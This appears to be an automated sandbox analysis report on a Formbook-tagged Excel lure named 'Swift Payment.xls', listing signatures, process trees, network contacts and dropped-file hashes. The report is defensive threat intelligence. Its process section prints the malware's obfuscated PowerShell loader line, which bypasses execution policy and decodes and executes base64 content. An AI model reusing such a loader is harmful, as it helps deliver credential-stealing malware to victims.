Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-rhtsbswarc
Target Swift Payment.xls
SHA256 eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847
Tags: formbook b48n defense_evasion discovery execution rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

Threat Level: Known bad

The file Swift Payment.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 14:12

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 14:12

Reported

2024-08-29 14:14

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1640 wrote to memory of 972 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe
PID 1640 wrote to memory of 972 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

Tags: persistence

Uses Volume Shadow Copy WMI provider

Tags: ransomware

Uses Volume Shadow Copy service COM API

Tags: ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.42:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 42.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.29.10:443 g.bing.com tcp
US 8.8.8.8:53 10.29.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 1b306dd9f3f47d2ce7ee410ccf2de568
SHA1 11406807cc231635dc166bf0b007c3d626103125
SHA256 c6546978d3810ba46cd19a1d96ec849b6199a0c02b6105f8f34364f38621a2c9
SHA512 372a538ad283e1fab8d863d61857a6c435578e24fdab7b115d149baf27808262177ae083d3e4b999db567b86243579f5043054cc520c7dfe68414c976a7e5f2a

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 14:12

Reported

2024-08-29 14:14

Platform

win7-20240708-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

Tags: trojan spyware stealer formbook

Formbook payload

Tags: rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

Tags: defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1880 set thread context of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 572 set thread context of 1212 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Windows\Explorer.EXE
PID 572 set thread context of 1212 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Windows\Explorer.EXE
PID 2024 set thread context of 1212 | N/A | C:\Windows\SysWOW64\help.exe | C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Tags: discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\help.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

Tags: adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\help.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2740 wrote to memory of 2632 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 2928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2928 wrote to memory of 2888 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2820 wrote to memory of 1880 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1212 wrote to memory of 2024 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\help.exe
PID 2024 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\help.exe | C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\help.exe | C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\help.exe | C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\help.exe | C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'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'+[cHAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'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'+[cHAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Windows\SysWOW64\help.exe

"C:\Windows\SysWOW64\help.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.50:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.opinatlas.app udp
US 8.8.8.8:53 www.46rr211sm.autos udp
US 8.8.8.8:53 www.3tcxr.xyz udp
US 8.8.8.8:53 www.iano-world.net udp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 82c02175409404faa4a437555f8afd87
SHA1 e4e4779a8c2d98aa2117e1eb26554fe7acc910c7
SHA256 ce2fa9fc2af477205b89c9c92764024096048565c70c8f147af267127702698b
SHA512 a888da3d47f2eb007b4ad839f6a2e2cf715f8056f20b9101f893e8476297b7fe6c2dc8d86034eb51ce22e1fd1cb396f137cb177f5884b79af1b20f4dbbf49aac

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 3e67053f124cd1c8e14d5e35f85e1cbb
SHA1 b2fbca7441eb8dc1665a51ca6990c7df4f4ae7a4
SHA256 cc2118cbdaaf54d1a2201d443b821962ddf2fb08899939e8afd8eaff8a05cc86
SHA512 2a08c98130f3cb46b93b986287de1f89d714d97337d306dce271da96f976b2e479e5d2d5b1f883b191389158660a570c3ba3a43ddae513da662ac1c546474081

C:\Users\Admin\AppData\Local\Temp\CabAF14.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\IEnetstateIntenet[1].hta

MD5 3e26ce1d61b2d6fe88553bc84b6ac32a
SHA1 c7109174e1d1faea9cceaa01955bbe2d138ed2d1
SHA256 f450ceba92f654aee3efb78425232cd2917de9e43a258423cc98b9667be6102f
SHA512 e931d2c520c205127fd4e3ad0a577111eb50cb592235447931a2739a4187afb0d9c6916acaee5ca58a82d4f27d652b620d6cba8d62814e405671b94bf5766259

\??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline

MD5 ae56762dc0d08b6711b54d95e3924a32
SHA1 b96e539a51c2c432cde1393bf5a555706aaa438a
SHA256 a4a3d179bf3f5c4b49b792211e81b7dddf4b4a86521f75b5422ed418d887b679
SHA512 a667b7354c055c1a5cbcd652b66566e851ed9ffdef1fbef40a5dc93e3f7f8bbf5da929b479bad43bb02a39108f1b8fcd9b58a6d3960985130b1daffa4cbb5a56

\??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.0.cs

MD5 ea113715d78eb5483c3507b3cbaebc06
SHA1 daa1297b0545649dd504537c2810082ef4156c32
SHA256 812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d
SHA512 3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

\??\c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp

MD5 cf0eba045c28eb2b4994be1e324e1216
SHA1 114167922a85316b65a9c8f2d5d96557186173cd
SHA256 bcb4caa01bedbe917faf95e2b9a929ac35ad4721beae9f952cba3e1bfaa7f04f
SHA512 0abafc0c13c77ca238a9fe1f4886c8ef9d02861aad3d08e3841e2134a00c403613a97822d4dbdf0ce1b179eac433d8aa990757947b075e4bbaffeda64ad7d8fa

C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp

MD5 3a7593cdda984754158e8af5d4c671c8
SHA1 81b0bee00b076c315415dec30a534011c85aaef5
SHA256 d5c9150e9d34895f9fa45514f0df0c3d7c22dba29ff3a2596713ca29023f217b
SHA512 2c7befee6bbada94e74c16b5ca962df59a9d5445583f6b75e930384ebe61e4173fbf1bceedae5bf80ca8decfe2b15104ba55fdb18bfb4ea76020f68e6be40d5a

C:\Users\Admin\AppData\Local\Temp\nkx7xczb.dll

MD5 df5477c845671846e563304193ec863d
SHA1 12f88c2e596aec3645e3f489d5d882970a399615
SHA256 c9ca950f2ab7a7e366d4f162c2cc41bc1c3613eb2c2b2ea5f604ac999f1aa00f
SHA512 c394689eb3996f10c7aa71180f53a8c7aba38e1116ba0b6fdcf00a0f7c2b98b3e77c1909e47e842c2a3c53bc8bc484254635b6a906fdd120c50f281c8acb9aac

C:\Users\Admin\AppData\Local\Temp\nkx7xczb.pdb

MD5 b50c297c51805c240ef0a12df98e881b
SHA1 6fbf3bf3b6af9940305028d16bf1f2095f699f0e
SHA256 adeaec9bd22a2be62463ab00a2f00f110244932872c48be060eeaa8f0b8d9ef2
SHA512 74391521d0681918955015102951ae185d312e2fa752998a7601f406c67f82fde8081e58a12b2acb1a236c35d8fdc36392a20881217571a508508ed8180fece5

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F06C5DE6.emf

MD5 8a188a6917ad1fa0c7f1aa20a63c8593
SHA1 4d2270d647d4a3680b47e85501c7ab1442ddcbb2
SHA256 728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3
SHA512 823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf
